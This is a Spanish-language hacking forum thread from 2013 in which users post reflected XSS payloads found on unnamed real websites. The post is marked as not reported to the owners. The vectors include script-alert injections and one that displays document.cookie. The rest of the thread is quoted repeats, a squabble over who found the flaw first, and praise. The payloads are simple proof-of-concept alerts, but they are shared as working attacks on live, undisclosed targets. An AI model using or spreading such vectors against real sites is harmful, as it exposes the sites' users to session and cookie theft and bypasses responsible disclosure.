XSS login.asp

Iniciado por Muppet, Marzo 12, 2013, 12:08:48 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 12, 2013, 12:08:48 AM Ultima modificación: Enero 10, 2015, 01:06:22 PM por Expermicid



Xss Reflected:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: <script>alert("HD_Breaker")</script>
Reportado: No

PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Buena, he encontrado varias así mismo.

Yo siempre eh tratado pero no eh encontrado web con esa vulnerabilidad en el login..
Muy bueno, gracias por compartir!
Saludos,, Cronos.-

Xss Reflected

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss

No se reportan todos los vectores, se reporta el fallo, XSS, IFxss es una variacion que depende del script inyectado pero sigue haciendo uso de un XSS

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
wow me sorprende tu conocimiento

respeto.

Jajajaajaajajajajaa que Kapo.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.